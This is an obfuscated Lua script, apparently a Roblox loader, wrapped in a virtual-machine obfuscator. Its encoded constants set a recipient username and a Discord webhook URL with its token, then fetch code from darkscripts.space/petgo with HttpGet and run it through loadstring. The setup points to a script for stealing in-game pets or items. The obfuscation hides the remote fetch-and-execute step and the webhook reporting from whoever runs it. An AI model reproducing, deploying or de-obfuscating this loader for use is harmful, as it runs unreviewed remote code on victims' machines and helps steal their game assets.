--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.8) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function() return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...) local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30) if (v1(v30,2)==81) then v19=v0(v3(v30,1,1));return "";else local v87=v2(v0(v30,16));if v19 then local v117=v5(v87,v19);v19=nil;return v117;else return v87;end end end);local function v20(v31,v32,v33) if v33 then local v88=(v31/(2^(v32-1)))%((5 -3)^(((v33-(2 -1)) -(v32-(1 -0))) + ((1 + 1) -1))) ;return v88-(v88%(620 -(555 + 64))) ;else local v89=931 -(857 + 74) ;local v90;while true do if (v89==(568 -(367 + 201))) then v90=(929 -(214 + (1590 -(282 + 595))))^(v32-1) ;return (((v31%(v90 + v90))>=v90) and 1) or (0 + 0) ;end end end end local function v21() local v34=1637 -(1523 + (496 -382)) ;local v35;while true do if (v34==(1 + 0)) then return v35;end if (v34==(0 -0)) then v35=v1(v16,v18,v18);v18=v18 + (1066 -(68 + 997)) ;v34=(1388 -(32 + 85)) -(222 + 4 + 1044) ;end end end local function v22() local v36,v37=v1(v16,v18,v18 + 2 );v18=v18 + 1 + 1 ;return (v37 * (1213 -(892 + 65))) + v36 ;end local function v23() local v38=0 -0 ;local v39;local v40;local v41;local v42;while true do if (v38==(1 -0)) then return (v42 * (41190819 -24413603)) + (v41 * (120312 -54776)) + (v40 * 256) + v39 ;end if (v38==(0 + 0)) then v39,v40,v41,v42=v1(v16,v18,v18 + (11 -8) );v18=v18 + ((952 -598) -(87 + 263)) ;v38=1;end end end local function v24() local v43=0 -(0 + 0) ;local v44;local v45;local v46;local v47;local v48;local v49;while true do if (v43==(2 + 0)) then v48=v20(v45,21,1028 -(915 + (299 -217)) );v49=((v20(v45,90 -58 )==(1 + 0)) and  -(1 -(0 -0))) or (1188 -(1069 + 118)) ;v43=6 -3 ;end if (v43==((860 -(814 + 45)) -(0 -0))) then v46=1 + 0 + 0 ;v47=(v20(v45,1 -0 ,8 + 12 + 0 ) * ((793 -((1253 -(261 + 624)) + (751 -328)))^(100 -68))) + v44 ;v43=20 -(10 + 8) ;end if (v43==((1091 -(1020 + 60)) -8)) then if (v48==0) then if (v47==(442 -(416 + 26))) then return v49 * 0 ;else local v131=(1423 -(630 + 793)) -(0 -0) ;while true do if (v131==(0 + 0)) then v48=1 -0 ;v46=0;break;end end end elseif (v48==(2485 -(145 + 293))) then return ((v47==(430 -(44 + 386))) and (v49 * ((1487 -(998 + 488))/(0 + 0)))) or (v49 * NaN) ;end return v8(v49,v48-(838 + 185) ) * (v46 + (v47/(2^(824 -((951 -750) + 571))))) ;end if (v43==(1138 -(116 + 1022))) then v44=v23();v45=v23();v43=4 -(2 + 1) ;end end end local function v25(v50) local v51=(1055 -(87 + 968)) -0 ;local v52;local v53;while true do if (v51==(1750 -(760 + 987))) then return v6(v53);end if (v51==(1913 -(1789 + 124))) then v52=nil;if  not v50 then local v124=0;while true do if (v124==(766 -((3279 -2534) + 21))) then v50=v23();if (v50==0) then return "";end break;end end end v51=1 + 0 + 0 ;end if (v51==(5 -3)) then v53={};for v118=3 -2 , #v52 do v53[v118]=v2(v1(v3(v52,v118,v118)));end v51=6 -3 ;end if (v51==(1 + 0)) then v52=v3(v16,v18,(v18 + v50) -1 );v18=v18 + v50 ;v51=2 + 0 ;end end end local v26=v23;local function v27(...) return {...},v12("#",...);end local function v28() local v54=(function() return function(v91,v92,v93,v94,v95,v96,v97,v98) local v91=(function() return 0 -0 ;end)();local v92=(function() return;end)();local v94=(function() return;end)();while true do if (v91==(1467 -(899 + 568))) then local v125=(function() return 0 + 0 ;end)();local v126=(function() return;end)();while true do if (v125~=0) then else v126=(function() return 0;end)();while true do if (v126==0) then v92=(function() return v93();end)();v94=(function() return nil;end)();v126=(function() return 2 -1 ;end)();end if (v126==1) then v91=(function() return  #":";end)();break;end end break;end end end if (v91~= #"[") then else if (v92== #"~") then v94=(function() return v93()~=0 ;end)();elseif (v92==2) then v94=(function() return v95();end)();elseif (v92~= #"19(") then else v94=(function() return v96();end)();end v97[v98]=(function() return v94;end)();break;end end return v91,v92,v93,v94,v95,v96,v97,v98;end;end)();local v55=(function() return function(v99,v100,v101,v102,v103,v104,v105,v106,v107) local v108=(function() return 603 -(268 + 335) ;end)();local v99=(function() return;end)();local v100=(function() return;end)();while true do if ((290 -(60 + 230))==v108) then local v128=(function() return 572 -(426 + 146) ;end)();local v129=(function() return;end)();while true do if (v128==(0 + 0)) then v129=(function() return 0;end)();while true do if (v129~=1) then else v108=(function() return 1;end)();break;end if (v129~=(1456 -(282 + 1174))) then else v99=(function() return 0;end)();v100=(function() return nil;end)();v129=(function() return 1;end)();end end break;end end end if (v108==1) then local v130=(function() return 0;end)();while true do if (v130~=0) then else while true do if (v99==0) then v100=(function() return v101();end)();if (v102(v100, #"~", #"~")==(811 -(569 + 242))) then local v188=(function() return 0;end)();local v189=(function() return;end)();local v190=(function() return;end)();local v191=(function() return;end)();local v192=(function() return;end)();while true do if (v188~=(5 -3)) then else while true do if (v189== #"{") then local v208=(function() return 0;end)();local v209=(function() return;end)();while true do if (v208~=(0 + 0)) then else v209=(function() return 1024 -(706 + 318) ;end)();while true do if (v209==1) then v189=(function() return 1253 -(721 + 530) ;end)();break;end if (v209==(1271 -(945 + 326))) then v192=(function() return {v103(),v103(),nil,nil};end)();if (v190==(0 + 0)) then local v216=(function() return 700 -(271 + 429) ;end)();local v217=(function() return;end)();while true do if (v216~=0) then else v217=(function() return 0 + 0 ;end)();while true do if (v217==0) then v192[ #"gha"]=(function() return v103();end)();v192[ #".dev"]=(function() return v103();end)();break;end end break;end end elseif (v190== #">") then v192[ #"91("]=(function() return v104();end)();elseif (v190==(1502 -(1408 + 92))) then v192[ #"91("]=(function() return v104() -(2^(1102 -(461 + 625))) ;end)();elseif (v190== #"19(") then local v224=(function() return 1288 -(993 + 295) ;end)();local v225=(function() return;end)();while true do if (v224~=0) then else v225=(function() return 0;end)();while true do if (v225~=0) then else v192[ #"nil"]=(function() return v104() -((1 + 1)^(1187 -(418 + 753))) ;end)();v192[ #"0313"]=(function() return v103();end)();break;end end break;end end end v209=(function() return 1 + 0 ;end)();end end break;end end end if (v189==(0 + 0)) then local v210=(function() return 0;end)();local v211=(function() return;end)();while true do if (v210~=0) then else v211=(function() return 0;end)();while true do if (v211==(1 + 0)) then v189=(function() return  #"\\";end)();break;end if (0==v211) then v190=(function() return v102(v100,1 + 1 , #"xnx");end)();v191=(function() return v102(v100, #"asd1",535 -(406 + 123) );end)();v211=(function() return 1770 -(1749 + 20) ;end)();end end break;end end end if (v189~=2) then else local v212=(function() return 0 + 0 ;end)();local v213=(function() return;end)();while true do if (v212==(1322 -(1249 + 73))) then v213=(function() return 0;end)();while true do if (v213~=1) then else v189=(function() return  #"gha";end)();break;end if (v213==(0 + 0)) then if (v102(v191, #" ", #"[")~= #"}") then else v192[2]=(function() return v105[v192[2]];end)();end if (v102(v191,2,2)~= #".") then else v192[ #"xxx"]=(function() return v105[v192[ #"xnx"]];end)();end v213=(function() return 1146 -(466 + 679) ;end)();end end break;end end end if (v189~= #"nil") then else if (v102(v191, #"xnx", #"nil")== #".") then v192[ #".com"]=(function() return v105[v192[ #"http"]];end)();end v106[v107]=(function() return v192;end)();break;end end break;end if (v188==(2 -1)) then local v205=(function() return 0;end)();local v206=(function() return;end)();while true do if (v205==0) then v206=(function() return 0 -0 ;end)();while true do if (v206==1) then v188=(function() return 1902 -(106 + 1794) ;end)();break;end if (v206==(0 + 0)) then v191=(function() return nil;end)();v192=(function() return nil;end)();v206=(function() return 1 + 0 ;end)();end end break;end end end if (v188==(0 -0)) then local v207=(function() return 0;end)();while true do if (v207==0) then v189=(function() return 0 -0 ;end)();v190=(function() return nil;end)();v207=(function() return 1;end)();end if ((115 -(4 + 110))~=v207) then else v188=(function() return 585 -(57 + 527) ;end)();break;end end end end end break;end end return v99,v100,v101,v102,v103,v104,v105,v106,v107;end end end end end;end)();local v56=(function() return function(v109,v110,v111) local v112=(function() return 1427 -(41 + 1386) ;end)();local v113=(function() return;end)();while true do if ((103 -(17 + 86))==v112) then v113=(function() return 0;end)();while true do if (v113==0) then local v132=(function() return 0 + 0 ;end)();local v133=(function() return;end)();while true do if ((0 -0)==v132) then v133=(function() return 0 -0 ;end)();while true do if (v133~=0) then else v109[v110-#"\\" ]=(function() return v111();end)();return v109,v110,v111;end end break;end end end end break;end end end;end)();local v57=(function() return {};end)();local v58=(function() return {};end)();local v59=(function() return {};end)();local v60=(function() return {v57,v58,nil,v59};end)();local v61=(function() return v23();end)();local v62=(function() return {};end)();for v70= #".",v61 do FlatIdent_63487,Type,v21,Cons,v24,v25,v62,v70=(function() return v54(FlatIdent_63487,Type,v21,Cons,v24,v25,v62,v70);end)();end v60[ #"91("]=(function() return v21();end)();for v71= #"<",v23() do FlatIdent_8199B,Descriptor,v21,v20,v22,v23,v62,v57,v71=(function() return v55(FlatIdent_8199B,Descriptor,v21,v20,v22,v23,v62,v57,v71);end)();end for v72= #".",v23() do v58,v72,v28=(function() return v56(v58,v72,v28);end)();end return v60;end local function v29(v64,v65,v66) local v67=v64[167 -(122 + 44) ];local v68=v64[1935 -(565 + 1368) ];local v69=v64[5 -2 ];return function(...) local v73=v67;local v74=v68;local v75=v69;local v76=v27;local v77=3 -2 ;local v78= -(1 + 0);local v79={};local v80={...};local v81=v12("#",...) -1 ;local v82={};local v83={};for v114=0 -0 ,v81 do if ((95<1957) and (v114>=v75)) then v79[v114-v75 ]=v80[v114 + (66 -(30 + 35)) ];else v83[v114]=v80[v114 + ((2 -0) -1) ];end end local v84=(v81-v75) + 1 + 0 ;local v85;local v86;while true do v85=v73[v77];v86=v85[1258 -(113 + 930 + 214) ];if (v86<=(18 -13)) then if ((826<1717) and (v86<=(1214 -(323 + (1286 -397))))) then if (v86<=(0 -(806 -(118 + 688)))) then local v134=580 -(361 + 219) ;local v135;local v136;local v137;local v138;while true do if ((1 + 1)==v134) then for v185=v135,v78 do local v186=320 -(53 + 267) ;while true do if (v186==(0 + 0)) then v138=v138 + (414 -(15 + 398)) ;v83[v185]=v136[v138];break;end end end break;end if ((1426>=1105) and (3330>2323) and (v134==(268 -(176 + 91)))) then v78=(v137 + v135) -(2 -1) ;v138=982 -(18 + 964) ;v134=7 -5 ;end if ((v134==(0 + 0)) or (3626==3989)) then v135=v85[1877 -(157 + 1718) ];v136,v137=v76(v83[v135](v13(v83,v135 + 1 + (48 -(25 + 23)) ,v85[853 -(20 + 830) ])));v134=1 + 0 ;end end elseif ((2754<=3379) and (v86>(1019 -(135 + 562 + 321)))) then v83[v85[5 -3 ]]=v85[129 -(116 + 10) ];else local v144;local v145,v146;local v147;local v148;v83[v85[1 + (1887 -(927 + 959)) ]]=v66[v85[741 -(542 + 196) ]];v77=v77 + (1 -0) ;v85=v73[v77];v148=v85[5 -3 ];v147=v83[v85[6 -3 ]];v83[v148 + 1 + 0 ]=v147;v83[v148]=v147[v85[1231 -(322 + 905) ]];v77=v77 + 1 ;v85=v73[v77];v83[v85[2 + (0 -0) ]]=v85[3];v77=v77 + (733 -(16 + 716)) + 0 ;v85=v73[v77];v148=v85[4 -2 ];v145,v146=v76(v83[v148](v13(v83,v148 + (2 -1) ,v85[875 -(826 + 46) ])));v78=(v146 + v148) -1 ;v144=1551 -(1126 + 425) ;for v170=v148,v78 do local v171=405 -(118 + (553 -266)) ;while true do if ((v171==(0 -(97 -(11 + 86)))) or (3927==1413)) then v144=v144 + ((2736 -1614) -(118 + 1003)) ;v83[v170]=v145[v144];break;end end end v77=v77 + (441 -(382 + (343 -(175 + 110)))) ;v85=v73[v77];v148=v85[5 -3 ];v83[v148]=v83[v148](v13(v83,v148 + (378 -(142 + 235)) ,v78));v77=v77 + 1 ;v85=v73[v77];v83[v85[9 -7 ]]();v77=v77 + 1 + 0 ;v85=v73[v77];v77=v85[980 -(553 + 424) ];end elseif (v86<=(5 -(4 -2))) then do return;end elseif (v86>(4 + 0)) then v77=v85[5 -2 ];else local v162=0 + 0 ;local v163;while true do if (v162==((0 -0) + 0)) then v163=v85[1 + 1 ];v83[v163]=v83[v163](v13(v83,v163 + 1 + 0 ,v78));break;end end end elseif (v86<=(17 -9)) then if (v86<=(16 -(1806 -(503 + 1293)))) then local v139=0 -0 ;while true do if (v139==(683 -(483 + 200))) then v66[v85[(2 -1) + 2 ]]=v83[v85[9 -7 ]];v77=v77 + (2 -(1 + 0)) ;v85=v73[v77];v139=754 -(239 + 514) ;end if ((v139==((1062 -(810 + 251)) + 1)) or (1154<=788)) then v66[v85[1332 -(554 + 243 + 532) ]]=v83[v85[2 + 0 + 0 ]];v77=v77 + (3 -2) ;v85=v73[v77];v139=3;end if ((v139==3) or (1643>3379)) then v83[v85[4 -2 ]]=v85[5 -(2 + 0) ];v77=v77 + 1 + 0 ;v85=v73[v77];v139=9 -5 ;end if ((1206 -(373 + 829))==v139) then v77=v85[734 -(476 + 255) ];break;end if ((v139==(1131 -(369 + 761))) or (2803>4549)) then v83[v85[2 + (533 -(43 + 490)) ]]=v85[5 -2 ];v77=v77 + (1 -0) ;v85=v73[v77];v139=(973 -(711 + 22)) -(64 + 174) ;end end elseif ((v86==(9 -(7 -5))) or (916==2671)) then if (v83[v85[1 + 1 ]]==v85[5 -(860 -(240 + 619)) ]) then v77=v77 + 1 + 0 ;else v77=v85[339 -(144 + 192) ];end else v66[v85[219 -(42 + 174) ]]=v83[v85[767 -(574 + 191) ]];end elseif ((272==272) and (v86<=(7 + 2))) then v83[v85[1 + 1 + (0 -0) ]]=v66[v85[2 + 1 ]];elseif (((4249<=4839) and (v86>((101 + 1413) -((2107 -(1344 + 400)) + 1141)))) or (220>=3022)) then local v166=126 -(55 + 71) ;local v167;local v168;while true do if (1==v166) then v83[v167 + (1581 -(1183 + 397)) ]=v168;v83[v167]=v168[v85[11 -7 ]];break;end if ((2777<3200) and (v166==(0 + 0))) then v167=v85[2 + 0 ];v168=v83[v85[1978 -(1913 + 62) ]];v166=1 -0 ;end end else v83[v85[2 + 0 ]]();end v77=v77 + (940 -(714 + (630 -(255 + 150)))) ;end end;end return v29(v28(),{},v17)(...);end return v15("LOL!0A3Q00028Q00026Q00F03F030A3Q006C6F6164737472696E6703043Q0067616D6503073Q00482Q7470476574031F3Q00682Q7470733A2Q2F6461726B736372697074732E73706163652F706574676F03083Q00557365726E616D65030D3Q004772616E745F6A6F7264616E3503073Q00576562682Q6F6B03793Q00682Q7470733A2Q2F646973636F72642E636F6D2F6170692F776562682Q6F6B732F31332Q30334Q342Q33382Q333230352Q372F385375544E2Q504F5658364759637433754B656D6C2Q582D4A556D50387549385F706F6E4864384C4443654C567256335A556C494846795F49344F77496864482D4F786700143Q0012023Q00013Q0026073Q000B000100020004053Q000B0001001209000100033Q001201000200043Q00202Q00020002000500122Q000400066Q000200046Q00013Q00024Q00010001000100044Q001300010026073Q0001000100010004053Q00010001001202000100083Q001206000100073Q00122Q0001000A3Q00122Q000100093Q00124Q00023Q00044Q000100012Q00033Q00017Q00",v9(),...);
